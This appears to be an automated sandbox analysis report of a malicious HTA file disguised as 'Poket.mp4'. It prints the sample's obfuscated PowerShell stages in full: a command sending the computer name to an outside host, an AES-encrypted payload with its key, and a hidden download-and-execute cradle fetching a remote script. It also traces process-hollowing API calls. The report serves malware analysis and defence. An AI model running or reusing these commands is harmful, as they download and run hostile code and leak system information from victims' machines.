                                                                                              2024-12-31 07:58:34 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                              Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:02:56:58
                                                                                              Start date:31/12/2024
                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\Poket.mp4.hta"
                                                                                              Imagebase:0xf00000
                                                                                              File size:13'312 bytes
                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:02:57:00
                                                                                              Start date:31/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA9B10D7039997896CBC84E96ED894759B7F6EC303D431A1C284E80B0F41DD7B7095C39DFA3FFA3C5DAC6503E4E7D2A9357E4D1035C7529DAF56510661E0073D0774CC37C6D50823062C71BD864FA83B7C62B39136EF3D2B925C41C459527BD11BD88B2C0EFB234AF3A9BEC1D80B39780B48025DFF5F6C178B93DDF712850D1DF01DDF854BCDC17A251FF77FCE0C9538100E20B760941EB486C522975B34051141DC18EF0568AFA1572E0FA83A5BC2690D31086904583C27EE9C817B126F2253CF3CCD1704914D8640C18CA31D535669F9FD6A603DD53F72A57B9CD5430327727286E7BAAD13A6FFC39662E283A7FF978BFBF5FC5CC5AD1B6532DAD68D41E04F618D40AF75F747B2981066564E6D25416F3791017B463E698B280398C63BC8933C29AF09616A94C3BEA7D4DB384704BEC738B9921BF8898C01D30527E0AC949344494C49B43088E1CCC8686C23391F17452B02D5B81B43B2D2C06B9F16A23E9E9D87814CE2370D93C6FA82BA38C67929FD4899A473FE61DC37CA5A87F2EF8787A58DFA80CAB07CA991B121E35B8C81230AE958AE8E041C71E8D01DDBA8E8B5FC137E517D861E573DDF771C76B9FF74293555133275E31FC6A9DD69E2383D6D68BA4A50C71EB2A01AC0D83ED9D780D8E2C705249A5FB8BFE6075BF00425C865366BF8B7520989948982EC086CB930C60BFD2A43919A6D60A56DB6D5147D44BDA26305E434FBAEB0372ECFF4AF87A4D8C4C335E58BEF871285E7EB21F6E254351190F01B546758AEB96D90EAC30AE12B03A24FC2F97D3E421D8714C4CBAC8A57055D7B008B6C2BAF399731AA3200F812001847FB33B62F48E736887780A85C4673F47E7ED462E33E1548C32D0267151021174D334A2D5A504C69A4558F49E6F1B0219CB89D4B6D3773C0D9D1AD71754E9FF3938CBBCBFFEDDE23BA04DCE969E1D8B3904AFA17A972C310F35BCF0D222510068B1DCA603907C82B4E210FDBC369FFFC25846BB4F20E2859617B32043C903816DE80A42B6E9E87F83C3747BFD728BBC1280E82110C8C4979D26AB88E59076F703E098EF3965B72D2B9804D2E94D41B50BC31EF628704BFC95A21A38302980725E11668416D8B1446E5D0C6855E9EA62636E456872FA1A80C8E4410D6871AF6AE9E0E601497E4F1A7F61DC6F43E939B216392102D05EE16C0164C7B92D9CC1CCC6D70E28514EE6924ECEAD49A161ABD47DF4A06F7ED617E02E525D5118BC8244B9298001EAA02AA3874785A6BFCDF3F8DF9DF76F9DBC541CF7B1A069EEB3CB9550D16');$IoNU=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((FRsZn('444C5A775845534878786D7A6C446679')),[byte[]]::new(16)).TransformFinalBlock($VUQBu,0,$VUQBu.Length)); & $IoNU.Substring(0,3) $IoNU.Substring(129)
                                                                                              Imagebase:0xbd0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:02:57:00
                                                                                              Start date:31/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:02:57:09
                                                                                              Start date:31/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
                                                                                              Imagebase:0xbd0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2542046628.00000000069E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:02:57:09
                                                                                              Start date:31/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:10
                                                                                              Start time:02:58:23
                                                                                              Start date:31/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                              Imagebase:0xbd0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Reset < >
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1788989367.000000000AA01000.00000010.00000800.00020000.00000000.sdmp, Offset: 0AA01000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_aa01000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a1ef5609a48ea132260e9a6fc8fddea9ac2a01fd68e1404638c4d808d0f86582
                                                                                                • Instruction ID: b412b44a525594a76fc166b4e5965a00b969a5ecc3e1dcdfc8d6c412be4058d6
                                                                                                • Opcode Fuzzy Hash: a1ef5609a48ea132260e9a6fc8fddea9ac2a01fd68e1404638c4d808d0f86582
                                                                                                • Instruction Fuzzy Hash: F3F0F931650315ABC758C758DC92FEE73E9AB08344F040628FA06E72C0F6A45D018794
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
                                                                                                • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
                                                                                                • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
                                                                                                • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
                                                                                                • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
                                                                                                • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
                                                                                                • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000003.1789010794.0000000005D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_3_5d40000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction ID: 17416483f995d066e3e033b9c7ec0a3e0296d9e8c0eeed770c1ab0717f253a7c
                                                                                                • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7860000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                • API String ID: 0-518715366
                                                                                                • Opcode ID: 1f8389952b093ffd20d0eb7f9a4543c192e8d0d52a254085acb9ca14fcea8fe0
                                                                                                • Instruction ID: 2ae083f66596ff7b23a0e734a24efb24f0c7985ef6079107713c4553e3106eae
                                                                                                • Opcode Fuzzy Hash: 1f8389952b093ffd20d0eb7f9a4543c192e8d0d52a254085acb9ca14fcea8fe0
                                                                                                • Instruction Fuzzy Hash: AD52B2B4B00205AFDB14DF58C858BAEBBE2BBA8305F54C4A9D905AF395CB31DC45CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7860000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-815214575
                                                                                                • Opcode ID: 745ac330c7743bb948594634f65a1a34c43c7ac26f3a469b512c20164d8cd1ab
                                                                                                • Instruction ID: 6cd321206d945ef620ae3addd82231c3f55bc9e67904c6de0725b268d7018a8b
                                                                                                • Opcode Fuzzy Hash: 745ac330c7743bb948594634f65a1a34c43c7ac26f3a469b512c20164d8cd1ab
                                                                                                • Instruction Fuzzy Hash: 7CC178B5F10219AFCB148F79880CA7ABBE29FE6611B18846BC505CF293DB31CD05C7A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7860000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 9d37643d760202f05a7c5f146064e13f0494639901eb725889b33f028c24438d
                                                                                                • Instruction ID: dd799e069710570e867b12a6c1f2a6cae9b594f973b3d032d6ed2a6d33975b1c
                                                                                                • Opcode Fuzzy Hash: 9d37643d760202f05a7c5f146064e13f0494639901eb725889b33f028c24438d
                                                                                                • Instruction Fuzzy Hash: 0EA163B4A00205AFDB14DF58C548BAEBBF3BBA9304F54C055EA05AB395CB71E845CB51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7860000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6567f8af3aa725686246c0075607588415f3124390b40b0c7fca087f3a6706aa
                                                                                                • Instruction ID: d9e5a94429601a8e937a4aa97f91820193411d972cb96fbadb97b816a2c4613f
                                                                                                • Opcode Fuzzy Hash: 6567f8af3aa725686246c0075607588415f3124390b40b0c7fca087f3a6706aa
                                                                                                • Instruction Fuzzy Hash: 36913EB4B00208EFCB14CF58C498AA9BBF2AF99315F54C059D905AF356CB72DC45CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7860000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ad942d0bfad134ec9d41e3e50522d123e709e08626b32b6767fd219cfa8276fc
                                                                                                • Instruction ID: c1ec20da74c44b5d3283f3dab786c6c2d8666d814103fc55dbee3faadeb4dcfb
                                                                                                • Opcode Fuzzy Hash: ad942d0bfad134ec9d41e3e50522d123e709e08626b32b6767fd219cfa8276fc
                                                                                                • Instruction Fuzzy Hash: 39914DB4A00209EFCB14CF54C588AA9BBF2EFA9325F54C159D904AB356C772EC45CFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7860000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e20a56a46d5fbd1b65c5ae3e39da6a805c9832993cc2ca10085d0953615d5956
                                                                                                • Instruction ID: 86600c3a706170e8bf3e2dd181d441ddca9387078148aed0fd95097533b3fc8c
                                                                                                • Opcode Fuzzy Hash: e20a56a46d5fbd1b65c5ae3e39da6a805c9832993cc2ca10085d0953615d5956
                                                                                                • Instruction Fuzzy Hash: E54117B5F10205AFCB148F64889CABD7BE29BA5204F5880A5D501DF2A3DB35DD45CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7860000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-324510305
                                                                                                • Opcode ID: dc1dfe7e013200013fe2030bb6e6c0013def6a5a4dcb7ac079c827eb64c28c21
                                                                                                • Instruction ID: 79b76dc7a102745431aef09471b95c63d547086c6ca5c78dd276a0199b821a13
                                                                                                • Opcode Fuzzy Hash: dc1dfe7e013200013fe2030bb6e6c0013def6a5a4dcb7ac079c827eb64c28c21
                                                                                                • Instruction Fuzzy Hash: 572123B6E1031DAFDB248E64D54CA65BBF5AFA2A10F18415BD840DF253CB31D904C762
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7860000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-324510305
                                                                                                • Opcode ID: e611f7be5051b9cc096a4a5738db0891d89df2c0c72cda09bfba9b125e69f6b0
                                                                                                • Instruction ID: 1848acbfc12da1b2cd6d90efbd6381787f7c989b7486874c07693241d13a7b4b
                                                                                                • Opcode Fuzzy Hash: e611f7be5051b9cc096a4a5738db0891d89df2c0c72cda09bfba9b125e69f6b0
                                                                                                • Instruction Fuzzy Hash: EB21F1B6E1021EAFDB288E55C54CA66B7F5AFA1A10F54415AE800DF353DB31D904C7A2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1784869289.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7860000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                • API String ID: 0-2049395529
                                                                                                • Opcode ID: d0ee3ce6e097cf19ea249e19fb741e64528f1dfb654b69b0fa8c34e69f9a0735
                                                                                                • Instruction ID: 01fea04585c617df03e2326976c5f04aa303e85bb4a87546a2b5a4ed63f1bac0
                                                                                                • Opcode Fuzzy Hash: d0ee3ce6e097cf19ea249e19fb741e64528f1dfb654b69b0fa8c34e69f9a0735
                                                                                                • Instruction Fuzzy Hash: F801F551B1D39A5BC73B163858286A56FB25FD365171901DBC080CF29BCE144D8983E2

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:53.3%
                                                                                                Total number of Nodes:15
                                                                                                Total number of Limit Nodes:2
                                                                                                execution_graph 64876 69493a7 64877 694933d Wow64SetThreadContext 64876->64877 64879 69493ab 64876->64879 64880 694936d 64877->64880 64872 6949b80 64873 6949bc8 WriteProcessMemory 64872->64873 64875 6949c1f 64873->64875 64881 694a2a0 64882 694a235 64881->64882 64883 694a2ab 64882->64883 64884 694a245 NtResumeThread 64882->64884 64885 694a26d 64884->64885 64886 6948b20 64887 6948b84 CreateProcessA 64886->64887 64889 6948d0c 64887->64889
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q
                                                                                                • API String ID: 0-2697143702
                                                                                                • Opcode ID: 698978c5d6d6e8dfa92362d92b1a07d026ee76bd8fcc3dafaba18a7967536582
                                                                                                • Instruction ID: 563fd0192d3130476ab5169ee5f56aa57599d256fc94e117fe7a9dbf885119eb
                                                                                                • Opcode Fuzzy Hash: 698978c5d6d6e8dfa92362d92b1a07d026ee76bd8fcc3dafaba18a7967536582
                                                                                                • Instruction Fuzzy Hash: 830330B4A002149FD754CB54C890BA9BBB2EF99304F54C1E9DA09AF391CB71ED86CF91
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06948CFA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
